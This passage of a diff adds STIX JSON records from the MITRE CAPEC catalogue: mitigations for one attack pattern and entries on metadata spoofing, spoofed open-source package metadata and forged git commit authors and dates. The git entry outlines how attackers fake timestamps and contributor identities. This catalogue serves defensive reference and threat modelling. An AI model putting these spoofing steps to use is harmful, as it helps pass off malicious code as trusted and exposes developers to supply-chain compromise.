"identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Apply the latest patches.", + "id": "course-of-action--82e53757-6195-45a8-87d8-b8a3471be28d", + "modified": "2021-10-21T00:00:00.000Z", + "name": "coa-69-2", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--3c3677a7-f6ef-4f6a-98f2-23a940c9d065", + "modified": "2021-10-21T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--82e53757-6195-45a8-87d8-b8a3471be28d", + "target_ref": "attack-pattern--ca989a50-b24e-4917-a234-ce4788fa21c7", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Scan your services and disable the ones which are not needed and are exposed unnecessarily. Exposing programs increases the attack surface. Only expose the services which are needed and have security mechanisms such as authentication built around them.", + "id": "course-of-action--7b2b2f5e-63ea-4e66-b1db-20c8cfb846bc", + "modified": "2021-10-21T00:00:00.000Z", + "name": "coa-69-3", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--3852cd85-fee0-458c-aa19-1ee065916045", + "modified": "2021-10-21T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--7b2b2f5e-63ea-4e66-b1db-20c8cfb846bc", + "target_ref": "attack-pattern--ca989a50-b24e-4917-a234-ce4788fa21c7", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Avoid revealing information about your system (e.g., version of the program) to anonymous users.", + "id": "course-of-action--2e81b94f-576a-4a5d-8535-19447cf00938", + "modified": "2021-10-21T00:00:00.000Z", + "name": "coa-69-4", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--6f38ce3b-57b6-40fc-8b8c-08befcded00e", + "modified": "2021-10-21T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--2e81b94f-576a-4a5d-8535-19447cf00938", + "target_ref": "attack-pattern--ca989a50-b24e-4917-a234-ce4788fa21c7", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Make sure that your program or service fail safely. What happen if the communication protocol is interrupted suddenly? What happen if a parameter is missing? Does your system have resistance and resilience to attack? Fail safely when a resource exhaustion occurs.", + "id": "course-of-action--c88ccddb-e8a1-4fd2-91df-be5dfb7cd1b3", + "modified": "2021-10-21T00:00:00.000Z", + "name": "coa-69-5", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--5b4e5f04-ebe0-4a77-b851-5826990a4dda", + "modified": "2021-10-21T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--c88ccddb-e8a1-4fd2-91df-be5dfb7cd1b3", + "target_ref": "attack-pattern--ca989a50-b24e-4917-a234-ce4788fa21c7", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "If possible use a sandbox model which limits the actions that programs can take. A sandbox restricts a program to a set of privileges and commands that make it difficult or impossible for the program to cause any damage.", + "id": "course-of-action--7031e154-89f3-4994-8c96-386138825551", + "modified": "2021-10-21T00:00:00.000Z", + "name": "coa-69-6", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--f29e28aa-4464-4272-a547-4585c2e99452", + "modified": "2021-10-21T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--7031e154-89f3-4994-8c96-386138825551", + "target_ref": "attack-pattern--ca989a50-b24e-4917-a234-ce4788fa21c7", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Check your program for buffer overflow and format String vulnerabilities which can lead to execution of malicious code.", + "id": "course-of-action--d97a8953-bfba-4b9a-ab46-36c6b343b91a", + "modified": "2021-10-21T00:00:00.000Z", + "name": "coa-69-7", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--5813c2bd-b132-4bc7-ae4d-5c4b492c361e", + "modified": "2021-10-21T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--d97a8953-bfba-4b9a-ab46-36c6b343b91a", + "target_ref": "attack-pattern--ca989a50-b24e-4917-a234-ce4788fa21c7", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Monitor traffic and resource usage and pay attention if resource exhaustion occurs.", + "id": "course-of-action--fe9d8853-a306-4443-b34e-d9d755890734", + "modified": "2021-10-21T00:00:00.000Z", + "name": "coa-69-8", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--d245d4d1-c52c-41ba-aae5-782470e499d9", + "modified": "2021-10-21T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--fe9d8853-a306-4443-b34e-d9d755890734", + "target_ref": "attack-pattern--ca989a50-b24e-4917-a234-ce4788fa21c7", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Protect your log file from unauthorized modification and log forging.", + "id": "course-of-action--94ece0ea-fea4-4009-86a0-589e49a5a8aa", + "modified": "2021-10-21T00:00:00.000Z", + "name": "coa-69-9", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--66ca67c0-4eaa-438c-ba7f-8bbdd79867b4", + "modified": "2021-10-21T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--94ece0ea-fea4-4009-86a0-589e49a5a8aa", + "target_ref": "attack-pattern--ca989a50-b24e-4917-a234-ce4788fa21c7", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2022-09-29T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "\n An adversary alters the metadata of a resource (e.g., file, directory, repository, etc.) to present a malicious resource as legitimate/credible.\n ", + "external_references": [ + { + "external_id": "CAPEC-690", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/690.html" + } + ], + "id": "attack-pattern--cfbf9111-48a7-4432-b27f-ab6698bd2f30", + "modified": "2022-09-29T00:00:00.000Z", + "name": "Metadata Spoofing", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Meta", + "x_capec_consequences": { + "Access_Control": [ + "Execute Unauthorized Commands" + ], + "Accountability": [ + "Hide Activities" + ], + "Authorization": [ + "Execute Unauthorized Commands" + ], + "Integrity": [ + "Modify Data" + ] + }, + "x_capec_domains": [ + "Social Engineering", + "Supply Chain", + "Software" + ], + "x_capec_extended_description": "\n One approach to this attack entails the adversary altering a maliciously modified resource's metadata in order to hide their malicious activity. Another approach involves altering the metadata of an adversary-created resource to make the source appear more credible. Adversaries may spoof a variety of metadata across a number of resources, such as the following:\n \n Authors of Version Control System (VCS) repository commits\n Open source package statistics\n File attributes, such as when a file was last update\n \n The ultimate goal of a Metadata Spoofing attack is to trick victims into believing the malicious resource being provided originates from a reputable source. However, the victim instead leverages the malicious resource, which could result in a number of negative technical impacts.\n ", + "x_capec_likelihood_of_attack": "Medium", + "x_capec_parent_of_refs": [ + "attack-pattern--1ff15c87-da1d-4bd6-803f-4052b7b5cec7" + ], + "x_capec_prerequisites": [ + "Identification of a resource whose metadata is to be spoofed" + ], + "x_capec_skills_required": { + "Medium": "Ability to spoof a variety of metadata to convince victims the source is trusted" + }, + "x_capec_status": "Stable", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + }, + { + "created": "2022-09-29T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Validate metadata of resources such as authors, timestamps, and statistics.", + "id": "course-of-action--a09f8862-6d33-4065-b321-fd1fa118d277", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-690-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2022-09-29T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--c218a980-8c1f-4985-9d6d-e70047973934", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--a09f8862-6d33-4065-b321-fd1fa118d277", + "target_ref": "attack-pattern--cfbf9111-48a7-4432-b27f-ab6698bd2f30", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2022-09-29T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Confirm the pedigree of open source packages and ensure the code being downloaded does not originate from another source.", + "id": "course-of-action--5c539235-8420-419a-b630-aaeeb1370bb5", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-690-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2022-09-29T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--daa28363-f6ed-4711-ba2e-706d0939d671", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--5c539235-8420-419a-b630-aaeeb1370bb5", + "target_ref": "attack-pattern--cfbf9111-48a7-4432-b27f-ab6698bd2f30", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2022-09-29T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Even if the metadata is properly checked and a user believes it to be legitimate, there may still be a chance that they've been duped. Therefore, leverage automated testing techniques to determine where malicious areas of the code may exist.", + "id": "course-of-action--2bd8e827-da82-4f00-b0bc-af7a04bcb005", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-690-2", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2022-09-29T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--2547b658-4e62-4ce1-a643-26751facc8f3", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--2bd8e827-da82-4f00-b0bc-af7a04bcb005", + "target_ref": "attack-pattern--cfbf9111-48a7-4432-b27f-ab6698bd2f30", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2022-09-29T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "\n An adversary spoofs open-source software metadata in an attempt to masquerade malicious software as popular, maintained, and trusted.\n ", + "external_references": [ + { + "external_id": "CAPEC-691", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/691.html" + }, + { + "external_id": "CWE-494", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/494.html" + }, + { + "description": "Supply Chain Compromise: Compromise Software Dependencies and Development Tools", + "external_id": "T1195.001", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1195/001" + }, + { + "description": "Supply Chain Compromise: Compromise Software Supply Chain", + "external_id": "T1195.002", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1195/002" + } + ], + "id": "attack-pattern--1ff15c87-da1d-4bd6-803f-4052b7b5cec7", + "modified": "2022-09-29T00:00:00.000Z", + "name": "Spoof Open-Source Software Metadata", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Standard", + "x_capec_can_follow_refs": [ + "attack-pattern--e9d5d2e4-588f-43c1-bc98-73417abbb727" + ], + "x_capec_can_precede_refs": [ + "attack-pattern--582f33d6-0aa7-4f34-a91e-d767a65adad1", + "attack-pattern--efb74200-657d-438c-aaff-bbd9644dd72d" + ], + "x_capec_child_of_refs": [ + "attack-pattern--cfbf9111-48a7-4432-b27f-ab6698bd2f30" + ], + "x_capec_consequences": { + "Access_Control": [ + "Execute Unauthorized Commands", + "Alter Execution Logic", + "Gain Privileges" + ], + "Accountability": [ + "Hide Activities" + ], + "Authorization": [ + "Execute Unauthorized Commands", + "Alter Execution Logic", + "Gain Privileges" + ], + "Integrity": [ + "Modify Data" + ] + }, + "x_capec_domains": [ + "Social Engineering", + "Supply Chain", + "Software" + ], + "x_capec_example_instances": [ + "An adversary provides a malicious open-source library, claiming to provide extended logging features and functionality, and spoofs the metadata with that of a widely used legitimate library. The adversary then tricks victims into including this library in their underlying application. Once the malicious software is incorporated into the application, the adversary is able to manipulate and exfiltrate log data." + ], + "x_capec_extended_description": "\n Due to open-source software's popularity, it serves as a desirable attack-vector for adversaries since a single malicious component may result in the exploitation of numerous systems/applications. Adversaries may, therefore, spoof the metadata pertaining to the open-source software in order to trick victims into downloading and using their malicious software. Examples of metadata that may be spoofed include:\n \n Owner of the software (e.g., repository or package owner)\n Author(s) of repository commits\n Frequency of repository commits\n Date/Time of repository commits\n Package or Repository \"stars\"\n \n Once the malicious software component has been integrated into an underlying application or executed on a system, the adversary is ultimately able to achieve numerous negative technical impacts within the system/application. This often occurs without any indication of compromise.\n ", + "x_capec_likelihood_of_attack": "Medium", + "x_capec_parent_of_refs": [ + "attack-pattern--e6f66953-7512-4efd-be4c-0426a37374a9", + "attack-pattern--3d0d771e-5878-4476-b870-e1f28a0bd596" + ], + "x_capec_peer_of_refs": [ + "attack-pattern--b6f0fd7e-6068-4557-976c-fd34914b11bf" + ], + "x_capec_prerequisites": [ + "Identification of a popular open-source component whose metadata is to be spoofed." + ], + "x_capec_skills_required": { + "Medium": "Ability to spoof a variety of software metadata to convince victims the source is trusted." + }, + "x_capec_status": "Stable", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + }, + { + "created": "2022-09-29T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Before downloading open-source software, perform precursory metadata checks to determine the author(s), frequency of updates, when the software was last updated, and if the software is widely leveraged.", + "id": "course-of-action--958d0282-f24d-4dda-ae92-2cdf628a4b77", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-691-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2022-09-29T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--8abf4804-4411-465e-bc5d-bb9fdd630bee", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--958d0282-f24d-4dda-ae92-2cdf628a4b77", + "target_ref": "attack-pattern--1ff15c87-da1d-4bd6-803f-4052b7b5cec7", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2022-09-29T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Within package managers, look for conflicting or non-unique repository references to determine if multiple packages share the same repository reference.", + "id": "course-of-action--7513c2fc-b7ba-4bad-87ba-9e9f964178bd", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-691-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2022-09-29T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--6da9df18-ac2f-482b-8ead-b6ea7bb31ffb", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--7513c2fc-b7ba-4bad-87ba-9e9f964178bd", + "target_ref": "attack-pattern--1ff15c87-da1d-4bd6-803f-4052b7b5cec7", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2022-09-29T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Reference vulnerability databases to determine if the software contains known vulnerabilities.", + "id": "course-of-action--2b940c94-f5be-4ab3-9bde-820843f3b48d", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-691-2", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2022-09-29T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--2e3a4d4f-a7fc-4640-8681-ce6e6af7ea36", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--2b940c94-f5be-4ab3-9bde-820843f3b48d", + "target_ref": "attack-pattern--1ff15c87-da1d-4bd6-803f-4052b7b5cec7", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2022-09-29T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Only download open-source software from reputable hosting sites or package managers.", + "id": "course-of-action--351a32e9-d4c3-45a9-91e8-3c37ee10071d", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-691-3", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2022-09-29T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--0661cc78-7fa4-41ac-acaa-c68639e51727", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--351a32e9-d4c3-45a9-91e8-3c37ee10071d", + "target_ref": "attack-pattern--1ff15c87-da1d-4bd6-803f-4052b7b5cec7", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2022-09-29T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Only download open-source software that has been adequately signed by the developer(s). For repository commits/tags, look for the \"Verified\" status and for developers leveraging \"Vigilant Mode\" (GitHub) or similar modes.", + "id": "course-of-action--9c19f6cd-f83c-49c0-bd5c-2b6a8ecb12f2", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-691-4", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2022-09-29T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--6d5ef1f9-17a1-45d4-a389-8f63910fb111", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--9c19f6cd-f83c-49c0-bd5c-2b6a8ecb12f2", + "target_ref": "attack-pattern--1ff15c87-da1d-4bd6-803f-4052b7b5cec7", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2022-09-29T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "After downloading open-source software, ensure integrity values have not changed.", + "id": "course-of-action--2e0aa60e-0ea0-401d-800a-881f35742e84", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-691-5", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2022-09-29T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--6522c681-96e4-4ab9-81fc-1661474dae8a", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--2e0aa60e-0ea0-401d-800a-881f35742e84", + "target_ref": "attack-pattern--1ff15c87-da1d-4bd6-803f-4052b7b5cec7", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2022-09-29T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Before executing or incorporating the software, leverage automated testing techniques (e.g., static and dynamic analysis) to determine if the software behaves maliciously.", + "id": "course-of-action--a2b1e7b0-5eb8-41e4-bfda-7afcb3a8fbdb", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-691-6", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2022-09-29T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--b7779daf-fe78-439a-a305-b9872fd6e09c", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--a2b1e7b0-5eb8-41e4-bfda-7afcb3a8fbdb", + "target_ref": "attack-pattern--1ff15c87-da1d-4bd6-803f-4052b7b5cec7", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2022-09-29T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "\n An adversary spoofs metadata pertaining to a Version Control System (VCS) (e.g., Git) repository's commits to deceive users into believing that the maliciously provided software is frequently maintained and originates from a trusted source.\n ", + "external_references": [ + { + "external_id": "CAPEC-692", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/692.html" + }, + { + "external_id": "CWE-494", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/494.html" + }, + { + "description": "Aviad Gershon, Unverified Commits: Are You Unknowingly Trusting Attackers’ Code?, 2022--07---15, Checkmarx", + "external_id": "REF-719", + "source_name": "reference_from_CAPEC", + "url": "https://checkmarx.com/blog/unverified-commits-are-you-unknowingly-trusting-attackers-code/" + }, + { + "description": "Deeba Ahmed, Hackers can spoof commit metadata to create false GitHub repositories, 2022--07---17, HackRead", + "external_id": "REF-720", + "source_name": "reference_from_CAPEC", + "url": "https://www.hackread.com/hackers-spoof-commit-metadata-false-github-repositories/" + } + ], + "id": "attack-pattern--e6f66953-7512-4efd-be4c-0426a37374a9", + "modified": "2022-09-29T00:00:00.000Z", + "name": "Spoof Version Control System Commit Metadata", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--1ff15c87-da1d-4bd6-803f-4052b7b5cec7" + ], + "x_capec_consequences": { + "Access_Control": [ + "Execute Unauthorized Commands", + "Alter Execution Logic", + "Gain Privileges" + ], + "Accountability": [ + "Hide Activities" + ], + "Authorization": [ + "Execute Unauthorized Commands", + "Alter Execution Logic", + "Gain Privileges" + ], + "Integrity": [ + "Modify Data" + ] + }, + "x_capec_domains": [ + "Social Engineering", + "Supply Chain", + "Software" + ], + "x_capec_example_instances": [ + "In July 2022, Checkmarx reported that GitHub commit metadata could be spoofed if unsigned commits were leveraged by the repository. Adversaries were able to spoof commit contributors, as well as the date/time of the commit. This resulted in commits appearing to originate from trusted developers and a GitHub activity graph that duped users into believing that the repository had been maintained for a significant period of time. The lack of commit metadata validation ultimately allowed adversaries to propagate malware to unsuspecting victims [REF-719] [REF-720]." + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Identify target: The adversary must first identify a target repository for them to spoof. Typically, this will be a popular and widely used repository, as to increase the amount of victims a successful attack will exploit.

Experiment

  1. Create malicious repository: The adversary must create a malicious repository that imitates the legitimate repository being spoofed. This may include creating a username that closely matches the legitimate repository owner; creating a repository name that closely matches the legitimate repository name; uploading the legitimate source code; and more.

  2. Spoof commit metadata: Once the malicious repository has been created, the adversary must then spoof the commit metadata to make the repository appear to be frequently maintained and originating from trusted sources.

    3. Techniques
    Git Commit Timestamps: The adversary generates numerous fake commits while setting the \"GIT_AUTHOR_DATE\" and \"GIT_COMMITTER_DATE\" environment variables to a date which is to be spoofed.
    Git Commit Contributors: The adversary obtains a legitimate and trusted user's email address and then sets this information via the \"git config\" command. The adversary can then commit changes leveraging this username.

Exploit

  1. Exploit victims: The adversary infiltrates software and/or system environments with the goal of conducting additional attacks.

    2. Techniques
    Active: The adversary attempts to trick victims into downloading the malicious software by means such as phishing and social engineering.
    Passive: The adversary waits for victims to download and leverage malicious software.
", + "x_capec_extended_description": "\n Version Control Systems are widely used by developers to host, track, and manage source code files in an easy and synchronous manner. These systems are often leveraged to host open-source software that other developers can incorporate into their own applications or use as standalone applications. To prevent downloading vulnerable and/or malicious code, developers will often check the metadata of VCS repository commits to determine the repository's overall pedigree. This may include a variety of information, such as the following:\n \n Owner of the repository\n Author(s) of commits\n Frequency of commits\n Date/Time of commits\n Repository activity graphs\n \n These precursory checks can assist developers in determining whether a trusted individual/organization is providing the source code, how often the code is updated, and the relative popularity of the software. However, an adversary can spoof this metadata to make a repository containing malicious code appear as originating from a trusted source, being frequently maintained, and being commonly used by other developers. Without performing additional security activities, unassuming developers may be duped by this spoofed metadata and include the malicious code within their systems/applications. The adversary is then ultimately able to achieve 